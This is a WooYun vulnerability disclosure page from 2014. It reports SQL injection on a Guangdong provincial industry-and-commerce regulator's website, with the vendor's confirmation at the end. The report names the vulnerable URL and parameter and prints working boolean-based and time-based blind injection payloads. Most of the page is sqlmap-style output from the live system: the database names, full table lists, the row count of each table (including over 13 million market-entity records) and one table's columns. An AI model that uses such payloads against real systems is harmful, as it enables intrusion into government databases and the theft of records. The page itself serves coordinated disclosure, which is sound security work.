当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-088885

漏洞标题:广东省工商行政管理局存在SQL注射信息量好像很大

相关厂商:cncert国家互联网应急中心

漏洞作者: Yang

提交时间:2014-12-27 16:05

修复时间:2015-02-10 16:06

公开时间:2015-02-10 16:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:14

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-27: 细节已通知厂商并且等待厂商处理中
2014-12-31: 厂商已经确认,细节仅向厂商公开
2015-01-10: 细节向核心白帽子及相关领域专家公开
2015-01-20: 细节向普通白帽子公开
2015-01-30: 细节向实习白帽子公开
2015-02-10: 细节向公众公开

简要描述:

广东省工商行政管理局存在SQL注射
信息量大不大我不知道。我只知道我网速不好

详细说明:

广东省工商行政管理局存在SQL注射
http://wljg.gdgs.gov.cn/newslist.aspx?itemid=1

---
Place: GET
Parameter: itemid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: itemid=1) AND 4027=4027 AND (5350=5350
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: itemid=-6077) OR 6471=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (6716=6716
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008


available databases [14]:
[*] Beian
[*] GDSGS_DEV
[*] GDSGS_DEVBak
[*] GDSGS_EXT
[*] GDSGS_EXTBak
[*] GDSGS_MID
[*] GDSGS_MIDBak
[*] gsmondb
[*] GSSGS_GGJ
[*] gstestdb
[*] master
[*] model
[*] msdb
[*] tempdb


漏洞证明:

1.jpg


Database: gsmondb
[85 tables]
+---------------------------------------------------+
| GSM_ADCLASSES |
| GSM_ADJUDGMENTGIST |
| GSM_AREA |
| GSM_AUDITMESG |
| GSM_COMINDUSTRY |
| GSM_COMPANY |
| GSM_COMSITE |
| GSM_CONVICTIONGIST |
| GSM_CZSSRECORD |
| GSM_DATASYNLOG |
| GSM_ENTITYTYPE |
| GSM_GDORGUNITS |
| GSM_ILLEGALACTION |
| GSM_ILLEGALCATEGORY |
| GSM_INSPECTCASE |
| GSM_LAWCONTENT |
| GSM_LAWFILEINFO |
| GSM_MESGLOG |
| GSM_MESGTEMPL |
| GSM_NEWSLIST |
| GSM_PUBWEBITEM |
| GSM_PUBWEBNEWS |
| GSM_PUBWEBUSER |
| GSM_SEARCHENGINE |
| GSM_SITECATETORY |
| GSM_SITEFIELDLOG |
| GSM_SPIDERAGENT |
| GSM_SPIDERTASK |
| GSM_TASK2SITEURL |
| GSM_TASK2TEMPURL |
| GSM_TASKADRECORD |
| GSM_TASKBHRECORD |
| GSM_TASKNTRECORD |
| GSM_VIEAPPLY |
| GSM_VIETEMPL |
| GSM_VIEXAPPLY |
| GSM_WRODDICT |
| Marketentity_440000 |
| Marketentity_440100 |
| Marketentity_440200 |
| Marketentity_440300 |
| Marketentity_440400 |
| Marketentity_440500 |
| Marketentity_440600 |
| Marketentity_440700 |
| Marketentity_440800 |
| Marketentity_440900 |
| Marketentity_441200 |
| Marketentity_441300 |
| Marketentity_441400 |
| Marketentity_441500 |
| Marketentity_441600 |
| Marketentity_441700 |
| Marketentity_441800 |
| Marketentity_441900 |
| Marketentity_442000 |
| Marketentity_445100 |
| Marketentity_445200 |
| Marketentity_445300 |
| SYSATTACHMENT |
| SYSDATALOG |
| SYSDBFLOWID |
| SYSDBVERSION |
| SYSFLOWTRACK |
| SYSPOWER |
| SYSRES2POWER |
| SYSROLE |
| SYSROLE2POWER |
| SYSROLE2RESINS |
| SYSSESSION |
| SYSUSER |
| SYSUSER2GROUP |
| SYSUSER2POWER |
| SYSUSER2RESINS |
| SYSUSER2ROLE |
| SYSUSERGROUP |
| SYSUSERGROUP2POWER |
| SYSUSERGROUP2ROLE |
| SYSUSERUNIT |
| SYSWEBPARAM |
| VIEW_COMSITE |
| VIEW_GDORGUNITS |
| VIEW_LAWFILEINFO |
| VIEW_Marketentity |
| VIEW_SPIDERLOG |
+---------------------------------------------------+
Database: master
[363 tables]
+---------------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS |
| INFORMATION_SCHEMA.COLUMNS |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE |
| INFORMATION_SCHEMA.DOMAINS |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE |
| INFORMATION_SCHEMA.PARAMETERS |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS |
| INFORMATION_SCHEMA.SCHEMATA |
| INFORMATION_SCHEMA.TABLES |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES |
| INFORMATION_SCHEMA.VIEWS |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE |
| spt_fallback_db |
| spt_fallback_dev |
| spt_fallback_usg |
| spt_monitor |
| spt_values |
| sys.all_columns |
| sys.all_objects |
| sys.all_parameters |
| sys.all_sql_modules |
| sys.all_views |
| sys.allocation_units |
| sys.assemblies |
| sys.assembly_files |
| sys.assembly_modules |
| sys.assembly_references |
| sys.assembly_types |
| sys.asymmetric_keys |
| sys.backup_devices |
| sys.certificates |
| sys.change_tracking_databases |
| sys.change_tracking_tables |
| sys.check_constraints |
| sys.column_type_usages |
| sys.column_xml_schema_collection_usages |
| sys.columns |
| sys.computed_columns |
| sys.configurations |
| sys.conversation_endpoints |
| sys.conversation_groups |
| sys.conversation_priorities |
| sys.credentials |
| sys.crypt_properties |
| sys.cryptographic_providers |
| sys.data_spaces |
| sys.database_audit_specification_details |
| sys.database_audit_specifications |
| sys.database_files |
| sys.database_mirroring |
| sys.database_mirroring_endpoints |
| sys.database_mirroring_witnesses |
| sys.database_permissions |
| sys.database_principal_aliases |
| sys.database_principals |
| sys.database_recovery_status |
| sys.database_role_members |
| sys.databases |
| sys.default_constraints |
| sys.destination_data_spaces |
| sys.dm_audit_actions |
| sys.dm_audit_class_type_map |
| sys.dm_broker_activated_tasks |
| sys.dm_broker_connections |
| sys.dm_broker_forwarded_messages |
| sys.dm_broker_queue_monitors |
| sys.dm_cdc_errors |
| sys.dm_cdc_log_scan_sessions |
| sys.dm_clr_appdomains |
| sys.dm_clr_loaded_assemblies |
| sys.dm_clr_properties |
| sys.dm_clr_tasks |
| sys.dm_cryptographic_provider_properties |
| sys.dm_database_encryption_keys |
| sys.dm_db_file_space_usage |
| sys.dm_db_index_usage_stats |
| sys.dm_db_mirroring_auto_page_repair |
| sys.dm_db_mirroring_connections |
| sys.dm_db_mirroring_past_actions |
| sys.dm_db_missing_index_details |
| sys.dm_db_missing_index_group_stats |
| sys.dm_db_missing_index_groups |
| sys.dm_db_partition_stats |
| sys.dm_db_persisted_sku_features |
| sys.dm_db_script_level |
| sys.dm_db_session_space_usage |
| sys.dm_db_task_space_usage |
| sys.dm_exec_background_job_queue |
| sys.dm_exec_background_job_queue_stats |
| sys.dm_exec_cached_plans |
| sys.dm_exec_connections |
| sys.dm_exec_procedure_stats |
| sys.dm_exec_query_memory_grants |
| sys.dm_exec_query_optimizer_info |
| sys.dm_exec_query_resource_semaphores |
| sys.dm_exec_query_stats |
| sys.dm_exec_query_transformation_stats |
| sys.dm_exec_requests |
| sys.dm_exec_sessions |
| sys.dm_exec_trigger_stats |
| sys.dm_filestream_file_io_handles |
| sys.dm_filestream_file_io_requests |
| sys.dm_fts_active_catalogs |
| sys.dm_fts_fdhosts |
| sys.dm_fts_index_population |
| sys.dm_fts_memory_buffers |
| sys.dm_fts_memory_pools |
| sys.dm_fts_outstanding_batches |
| sys.dm_fts_population_ranges |
| sys.dm_io_backup_tapes |
| sys.dm_io_cluster_shared_drives |
| sys.dm_io_pending_io_requests |
| sys.dm_os_buffer_descriptors |
| sys.dm_os_child_instances |
| sys.dm_os_cluster_nodes |
| sys.dm_os_dispatcher_pools |
| sys.dm_os_dispatchers |
| sys.dm_os_hosts |
| sys.dm_os_latch_stats |
| sys.dm_os_loaded_modules |
| sys.dm_os_memory_allocations |
| sys.dm_os_memory_brokers |
| sys.dm_os_memory_cache_clock_hands |
| sys.dm_os_memory_cache_counters |
| sys.dm_os_memory_cache_entries |
| sys.dm_os_memory_cache_hash_tables |
| sys.dm_os_memory_clerks |
| sys.dm_os_memory_node_access_stats |
| sys.dm_os_memory_nodes |
| sys.dm_os_memory_objects |
| sys.dm_os_memory_pools |
| sys.dm_os_nodes |
| sys.dm_os_performance_counters |
| sys.dm_os_process_memory |
| sys.dm_os_ring_buffers |
| sys.dm_os_schedulers |
| sys.dm_os_spinlock_stats |
| sys.dm_os_stacks |
| sys.dm_os_sublatches |
| sys.dm_os_sys_info |
| sys.dm_os_sys_memory |
| sys.dm_os_tasks |
| sys.dm_os_threads |
| sys.dm_os_virtual_address_dump |
| sys.dm_os_wait_stats |
| sys.dm_os_waiting_tasks |
| sys.dm_os_windows_info |
| sys.dm_os_worker_local_storage |
| sys.dm_os_workers |
| sys.dm_qn_subscriptions |
| sys.dm_repl_articles |
| sys.dm_repl_schemas |
| sys.dm_repl_tranhash |
| sys.dm_repl_traninfo |
| sys.dm_resource_governor_configuration |
| sys.dm_resource_governor_resource_pools |
| sys.dm_resource_governor_workload_groups |
| sys.dm_server_audit_status |
| sys.dm_server_memory_dumps |
| sys.dm_server_registry |
| sys.dm_server_services |
| sys.dm_tran_active_snapshot_database_transactions |
| sys.dm_tran_active_transactions |
| sys.dm_tran_commit_table |
| sys.dm_tran_current_snapshot |
| sys.dm_tran_current_transaction |
| sys.dm_tran_database_transactions |
| sys.dm_tran_locks |
| sys.dm_tran_session_transactions |
| sys.dm_tran_top_version_generators |
| sys.dm_tran_transactions_snapshot |
| sys.dm_tran_version_store |
| sys.dm_xe_map_values |
| sys.dm_xe_object_columns |
| sys.dm_xe_objects |
| sys.dm_xe_packages |
| sys.dm_xe_session_event_actions |
| sys.dm_xe_session_events |
| sys.dm_xe_session_object_columns |
| sys.dm_xe_session_targets |
| sys.dm_xe_sessions |
| sys.endpoint_webmethods |
| sys.endpoints |
| sys.event_notification_event_types |
| sys.event_notifications |
| sys.events |
| sys.extended_procedures |
| sys.extended_properties |
| sys.filegroups |
| sys.foreign_key_columns |
| sys.foreign_keys |
| sys.fulltext_catalogs |
| sys.fulltext_document_types |
| sys.fulltext_index_catalog_usages |
| sys.fulltext_index_columns |
| sys.fulltext_index_fragments |
| sys.fulltext_indexes |
| sys.fulltext_languages |
| sys.fulltext_stoplists |
| sys.fulltext_stopwords |
| sys.fulltext_system_stopwords |
| sys.function_order_columns |
| sys.http_endpoints |
| sys.identity_columns |
| sys.index_columns |
| sys.indexes |
| sys.internal_tables |
| sys.key_constraints |
| sys.key_encryptions |
| sys.linked_logins |
| sys.login_token |
| sys.master_files |
| sys.master_key_passwords |
| sys.message_type_xml_schema_collection_usages |
| sys.messages |
| sys.module_assembly_usages |
| sys.numbered_procedure_parameters |
| sys.numbered_procedures |
| sys.objects |
| sys.openkeys |
| sys.parameter_type_usages |
| sys.parameter_xml_schema_collection_usages |
| sys.parameters |
| sys.partition_functions |
| sys.partition_parameters |
| sys.partition_range_values |
| sys.partition_schemes |
| sys.partitions |
| sys.plan_guides |
| sys.procedures |
| sys.remote_logins |
| sys.remote_service_bindings |
| sys.resource_governor_configuration |
| sys.resource_governor_resource_pools |
| sys.resource_governor_workload_groups |
| sys.routes |
| sys.schemas |
| sys.securable_classes |
| sys.server_assembly_modules |
| sys.server_audit_specification_details |
| sys.server_audit_specifications |
| sys.server_audits |
| sys.server_event_notifications |
| sys.server_event_session_actions |
| sys.server_event_session_events |
| sys.server_event_session_fields |
| sys.server_event_session_targets |
| sys.server_event_sessions |
| sys.server_events |
| sys.server_file_audits |
| sys.server_permissions |
| sys.server_principal_credentials |
| sys.server_principals |
| sys.server_role_members |
| sys.server_sql_modules |
| sys.server_trigger_events |
| sys.server_triggers |
| sys.servers |
| sys.service_broker_endpoints |
| sys.service_contract_message_usages |
| sys.service_contract_usages |
| sys.service_contracts |
| sys.service_message_types |
| sys.service_queue_usages |
| sys.service_queues |
| sys.services |
| sys.soap_endpoints |
| sys.spatial_index_tessellations |
| sys.spatial_indexes |
| sys.spatial_reference_systems |
| sys.sql_dependencies |
| sys.sql_expression_dependencies |
| sys.sql_logins |
| sys.sql_modules |
| sys.stats |
| sys.stats_columns |
| sys.symmetric_keys |
| sys.synonyms |
| sys.sysaltfiles |
| sys.syscacheobjects |
| sys.syscharsets |
| sys.syscolumns |
| sys.syscomments |
| sys.sysconfigures |
| sys.sysconstraints |
| sys.syscurconfigs |
| sys.syscursorcolumns |
| sys.syscursorrefs |
| sys.syscursors |
| sys.syscursortables |
| sys.sysdatabases |
| sys.sysdepends |
| sys.sysdevices |
| sys.sysfilegroups |
| sys.sysfiles |
| sys.sysforeignkeys |
| sys.sysfulltextcatalogs |
| sys.sysindexes |
| sys.sysindexkeys |
| sys.syslanguages |
| sys.syslockinfo |
| sys.syslogins |
| sys.sysmembers |
| sys.sysmessages |
| sys.sysobjects |
| sys.sysoledbusers |
| sys.sysopentapes |
| sys.sysperfinfo |
| sys.syspermissions |
| sys.sysprocesses |
| sys.sysprotects |
| sys.sysreferences |
| sys.sysremotelogins |
| sys.sysservers |
| sys.system_columns |
| sys.system_components_surface_area_configuration |
| sys.system_internals_allocation_units |
| sys.system_internals_partition_columns |
| sys.system_internals_partitions |
| sys.system_objects |
| sys.system_parameters |
| sys.system_sql_modules |
| sys.system_views |
| sys.systypes |
| sys.sysusers |
| sys.table_types |
| sys.tables |
| sys.tcp_endpoints |
| sys.trace_categories |
| sys.trace_columns |
| sys.trace_event_bindings |
| sys.trace_events |
| sys.trace_subclass_values |
| sys.traces |
| sys.transmission_queue |
| sys.trigger_event_types |
| sys.trigger_events |
| sys.triggers |
| sys.type_assembly_usages |
| sys.types |
| sys.user_token |
| sys.via_endpoints |
| sys.views |
| sys.xml_indexes |
| sys.xml_schema_attributes |
| sys.xml_schema_collections |
| sys.xml_schema_component_placements |
| sys.xml_schema_components |
| sys.xml_schema_elements |
| sys.xml_schema_facets |
| sys.xml_schema_model_groups |
| sys.xml_schema_namespaces |
| sys.xml_schema_types |
| sys.xml_schema_wildcard_namespaces |
| sys.xml_schema_wildcards |
+---------------------------------------------------+
Database: msdb
[21 tables]
+---------------------------------------------------+
| backupfile |
| backupmediafamily |
| backupmediaset |
| backupset |
| logmarkhistory |
| restorefile |
| restorefilegroup |
| restorehistory |
| suspect_pages |
| sysdac_instances |
| syspolicy_conditions |
| syspolicy_configuration |
| syspolicy_object_sets |
| syspolicy_policies |
| syspolicy_policy_categories |
| syspolicy_policy_category_subscriptions |
| syspolicy_policy_execution_history |
| syspolicy_policy_execution_history_details |
| syspolicy_system_health_state |
| syspolicy_target_set_levels |
| syspolicy_target_sets |
+---------------------------------------------------+
Database: gsmondb
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.VIEW_Marketentity | 13570471 |
| dbo.Marketentity_440100 | 2448200 |
| dbo.Marketentity_440300 | 2292136 |
| dbo.Marketentity_441900 | 1401793 |
| dbo.Marketentity_440600 | 1145169 |
| dbo.Marketentity_442000 | 887012 |
| dbo.Marketentity_440700 | 640483 |
| dbo.Marketentity_441300 | 593680 |
| dbo.Marketentity_440500 | 450960 |
| dbo.Marketentity_440800 | 424390 |
| dbo.Marketentity_440900 | 377784 |
| dbo.Marketentity_441200 | 368522 |
| dbo.Marketentity_441800 | 356939 |
| dbo.Marketentity_440400 | 351450 |
| dbo.Marketentity_441400 | 327696 |
| dbo.Marketentity_440200 | 259239 |
| dbo.GSM_GDORGUNITS | 253813 |
| dbo.Marketentity_445200 | 236183 |
| dbo.Marketentity_441700 | 230254 |
| dbo.Marketentity_441600 | 217648 |
| dbo.Marketentity_441500 | 174417 |
| dbo.Marketentity_445300 | 172525 |
| dbo.Marketentity_445100 | 164257 |
| dbo.Marketentity_440000 | 49734 |
| dbo.SYSUSER | 25963 |
| dbo.GSM_CZSSRECORD | 23770 |
| dbo.VIEW_LAWFILEINFO | 12071 |
| dbo.GSM_LAWCONTENT | 12021 |
| dbo.SYSDATALOG | 9304 |
| dbo.GSM_TASK2SITEURL | 8090 |
| dbo.VIEW_SPIDERLOG | 8090 |
| dbo.GSM_SITEFIELDLOG | 6582 |
| dbo.GSM_TASKADRECORD | 5648 |
| dbo.GSM_TASKNTRECORD | 4463 |
| dbo.GSM_COMSITE | 4419 |
| dbo.VIEW_COMSITE | 4419 |
| dbo.GSM_AREA | 3520 |
| dbo.SYSROLE2POWER | 3201 |
| dbo.GSM_ADJUDGMENTGIST | 2962 |
| dbo.GSM_ILLEGALACTION | 2714 |
| dbo.GSM_CONVICTIONGIST | 2553 |
| dbo.GSM_ILLEGALCATEGORY | 2436 |
| dbo.VIEW_GDORGUNITS | 2396 |
| dbo.GSM_COMPANY | 2132 |
| dbo.SYSFLOWTRACK | 1951 |
| dbo.GSM_ADCLASSES | 1924 |
| dbo.SYSSESSION | 1913 |
| dbo.SYSUSERUNIT | 1516 |
| dbo.GSM_COMINDUSTRY | 1417 |
| dbo.GSM_LAWFILEINFO | 873 |
| dbo.GSM_MESGLOG | 528 |
| dbo.SYSPOWER | 418 |
| dbo.GSM_PUBWEBUSER | 327 |
| dbo.SYSUSER2ROLE | 280 |
| dbo.GSM_VIEAPPLY | 202 |
| dbo.GSM_DATASYNLOG | 106 |
| dbo.SYSWEBPARAM | 93 |
| dbo.SYSDBVERSION | 63 |
| dbo.GSM_ENTITYTYPE | 54 |
| dbo.SYSDBFLOWID | 31 |
| dbo.GSM_MESGTEMPL | 24 |
| dbo.GSM_PUBWEBNEWS | 24 |
| dbo.SYSUSER2POWER | 23 |
| dbo.SYSROLE | 19 |
| dbo.GSM_PUBWEBITEM | 17 |
| dbo.GSM_SITECATETORY | 17 |
| dbo.GSM_AUDITMESG | 12 |
| dbo.GSM_NEWSLIST | 12 |
| dbo.GSM_SPIDERTASK | 11 |
| dbo.GSM_VIETEMPL | 5 |
| dbo.GSM_TASKBHRECORD | 4 |
| dbo.GSM_SPIDERAGENT | 3 |
| dbo.GSM_WRODDICT | 3 |
| dbo.GSM_SEARCHENGINE | 2 |
| dbo.SYSUSERGROUP | 1 |
+--------------------------------------------------+---------+
Database: master
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| sys.dm_os_buffer_descriptors | 1409049 |
| sys.dm_os_memory_objects | 115164 |
| sys.messages | 98626 |
| sys.sysmessages | 98626 |
| sys.dm_os_virtual_address_dump | 89930 |
| sys.dm_os_memory_cache_entries | 63521 |
| sys.syscacheobjects | 47867 |
| sys.dm_exec_cached_plans | 46963 |
| sys.fulltext_system_stopwords | 15829 |
| sys.dm_exec_query_stats | 13323 |
| sys.syscolumns | 12013 |
| sys.dm_os_ring_buffers | 11618 |
| sys.all_parameters | 7097 |
| sys.system_parameters | 7097 |
| sys.trace_subclass_values | 5366 |
| sys.all_columns | 4710 |
| sys.system_columns | 4666 |
| sys.trace_event_bindings | 4304 |
| sys.syscomments | 3003 |
| sys.dm_xe_object_columns | 2778 |
| dbo.spt_values | 2508 |
| sys.all_objects | 1941 |
| sys.sysobjects | 1941 |
| sys.system_objects | 1935 |
| sys.database_permissions | 1851 |
| sys.syspermissions | 1851 |
| sys.sysprotects | 1850 |
| sys.all_sql_modules | 1790 |
| sys.system_sql_modules | 1790 |
| sys.dm_xe_map_values | 1736 |
| sys.dm_db_index_usage_stats | 1438 |
| sys.dm_os_performance_counters | 1333 |
| sys.sysperfinfo | 1333 |
| sys.dm_xe_objects | 547 |
| sys.dm_os_wait_stats | 490 |
| sys.dm_audit_actions | 454 |
| sys.dm_db_missing_index_details | 442 |
| sys.dm_db_missing_index_groups | 442 |
| sys.dm_os_memory_cache_clock_hands | 433 |
| sys.dm_db_missing_index_group_stats | 423 |
| sys.spatial_reference_systems | 390 |
| sys.dm_exec_query_transformation_stats | 379 |
| sys.event_notification_event_types | 365 |
| sys.all_views | 358 |
| sys.system_views | 358 |
| sys.dm_os_memory_clerks | 334 |
| sys.trigger_event_types | 245 |
| sys.allocation_units | 216 |
| sys.dm_db_partition_stats | 190 |
| sys.partitions | 190 |
| sys.dm_os_memory_cache_counters | 181 |
| sys.trace_events | 180 |
| sys.dm_os_spinlock_stats | 176 |
| sys.dm_os_latch_stats | 144 |
| sys.dm_os_threads | 131 |
| sys.dm_os_worker_local_storage | 122 |
| sys.dm_os_workers | 122 |
| sys.syscharsets | 114 |
| sys.xml_schema_facets | 112 |
| sys.dm_server_registry | 99 |
| sys.xml_schema_components | 99 |
| sys.system_components_surface_area_configuration | 95 |
| sys.dm_os_loaded_modules | 93 |
| sys.dm_audit_class_type_map | 83 |
| sys.xml_schema_types | 82 |
| sys.dm_os_memory_pools | 74 |
| sys.configurations | 70 |
| sys.sysconfigures | 70 |
| sys.syscurconfigs | 70 |
| sys.trace_columns | 66 |
| sys.dm_db_session_space_usage | 57 |
| sys.dm_db_task_space_usage | 57 |
| sys.sysprocesses | 57 |
| sys.dm_exec_sessions | 56 |
| sys.dm_os_memory_cache_hash_tables | 56 |
| sys.dm_os_tasks | 56 |
| sys.dm_exec_procedure_stats | 55 |
| sys.dm_fts_index_population | 51 |
| sys.fulltext_document_types | 50 |
| sys.fulltext_languages | 48 |
| sys.sql_dependencies | 46 |
| sys.sysdepends | 46 |
| INFORMATION_SCHEMA.COLUMNS | 44 |
| sys.columns | 44 |
| sys.dm_exec_query_optimizer_info | 39 |
| sys.systypes | 34 |
| sys.types | 34 |
| sys.syslanguages | 33 |
| sys.dm_exec_requests | 31 |
| sys.dm_os_schedulers | 31 |
| sys.dm_exec_connections | 27 |
| sys.dm_tran_locks | 27 |
| sys.syslockinfo | 27 |
| sys.dm_os_memory_node_access_stats | 24 |
| sys.securable_classes | 22 |
| sys.trace_categories | 21 |
| sys.dm_os_waiting_tasks | 19 |
| sys.xml_schema_component_placements | 18 |
| sys.dm_os_stacks | 16 |
| sys.xml_schema_attributes | 15 |
| sys.database_mirroring | 14 |
| sys.database_principals | 14 |
| sys.database_recovery_status | 14 |
| sys.databases | 14 |
| sys.sysdatabases | 14 |
| sys.sysusers | 14 |
| INFORMATION_SCHEMA.SCHEMATA | 13 |
| sys.schemas | 13 |
| sys.server_principals | 11 |
| sys.service_contract_message_usages | 11 |
| sys.dm_xe_session_event_actions | 10 |
| sys.server_event_session_actions | 10 |
| sys.dm_tran_database_transactions | 8 |
| sys.dm_fts_active_catalogs | 7 |
| sys.dm_tran_active_transactions | 7 |
| sys.server_permissions | 7 |
| sys.sysindexes | 7 |
| sys.dm_os_memory_brokers | 6 |
| sys.indexes | 6 |
| sys.objects | 6 |
| sys.stats_columns | 6 |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES | 5 |
| INFORMATION_SCHEMA.TABLES | 5 |
| sys.dm_xe_session_events | 5 |
| sys.endpoints | 5 |
| sys.index_columns | 5 |
| sys.linked_logins | 5 |
| sys.server_event_session_events | 5 |
| sys.servers | 5 |
| sys.sysindexkeys | 5 |
| sys.sysoledbusers | 5 |
| sys.sysservers | 5 |
| sys.tables | 5 |
| sys.dm_exec_query_resource_semaphores | 4 |
| sys.dm_os_hosts | 4 |
| sys.dm_xe_packages | 4 |
| sys.login_token | 4 |
| sys.assembly_types | 3 |
| sys.dm_broker_queue_monitors | 3 |
| sys.dm_clr_properties | 3 |
| sys.dm_os_memory_nodes | 3 |
| sys.dm_os_nodes | 3 |
| sys.dm_xe_session_object_columns | 3 |
| sys.server_role_members | 3 |
| sys.service_queue_usages | 3 |
| sys.stats | 3 |
| sys.type_assembly_usages | 3 |
| sys.xml_schema_namespaces | 3 |
| sys.database_files | 2 |
| sys.dm_exec_trigger_stats | 2 |
| sys.dm_fts_memory_pools | 2 |
| sys.dm_os_cluster_nodes | 2 |
| sys.dm_os_dispatcher_pools | 2 |
| sys.dm_os_dispatchers | 2 |
| sys.dm_resource_governor_resource_pools | 2 |
| sys.dm_resource_governor_workload_groups | 2 |
| sys.dm_server_services | 2 |
| sys.service_contract_usages | 2 |
| sys.sql_logins | 2 |
| sys.sysfiles | 2 |
| sys.syslogins | 2 |
| sys.tcp_endpoints | 2 |
| sys.user_token | 2 |
| dbo.spt_monitor | 1 |
| sys.assemblies | 1 |
| sys.assembly_files | 1 |
| sys.data_spaces | 1 |
| sys.database_role_members | 1 |
| sys.default_constraints | 1 |
| sys.dm_db_file_space_usage | 1 |
| sys.dm_exec_background_job_queue_stats | 1 |
| sys.dm_exec_query_memory_grants | 1 |
| sys.dm_fts_fdhosts | 1 |
| sys.dm_io_cluster_shared_drives | 1 |
| sys.dm_io_pending_io_requests | 1 |
| sys.dm_os_process_memory | 1 |
| sys.dm_os_sys_info | 1 |
| sys.dm_os_sys_memory | 1 |
| sys.dm_os_windows_info | 1 |
| sys.dm_resource_governor_configuration | 1 |
| sys.dm_tran_current_transaction | 1 |
| sys.dm_xe_session_targets | 1 |
| sys.dm_xe_sessions | 1 |
| sys.filegroups | 1 |
| sys.server_event_session_fields | 1 |
| sys.server_event_session_targets | 1 |
| sys.server_event_sessions | 1 |
| sys.sysconstraints | 1 |
| sys.sysfilegroups | 1 |
| sys.sysmembers | 1 |
| sys.via_endpoints | 1 |
| sys.xml_schema_collections | 1 |
| sys.xml_schema_model_groups | 1 |
| sys.xml_schema_wildcards | 1 |
+--------------------------------------------------+---------+
Database: msdb
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.backupfile | 4876 |
| dbo.backupmediafamily | 1085 |
| dbo.backupmediaset | 1085 |
| dbo.backupset | 1085 |
| dbo.restorefile | 90 |
| dbo.restorefilegroup | 28 |
| dbo.restorehistory | 10 |
| dbo.syspolicy_configuration | 4 |
+--------------------------------------------------+---------+


Database: gsmondb
Table: GSM_GDORGUNITS
[19 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| address | nvarchar |
| AREA_CODE | nvarchar |
| city | nvarchar |
| country | nvarchar |
| deleted | smallint |
| faxNumber | nvarchar |
| fsEmail | nvarchar |
| masterPosID | nvarchar |
| name | nvarchar |
| note | nvarchar |
| oashortname | binary |
| orgUnitID | nvarchar |
| orgUnitTypeID | nvarchar |
| phoneNumber | nvarchar |
| postCode | nvarchar |
| province | nvarchar |
| region | nvarchar |
| shortname | nvarchar |
| TIMESTAMP | binary |
+---------------+----------+


网速慢。。容易卡死

修复方案:

版权声明:转载请注明来源 Yang@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-12-31 16:11

厂商回复:

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据:高
攻击成本:低
造成影响:高
综合评级为:高,rank:15
正在联系相关网站管理单位处置。

最新状态:

暂无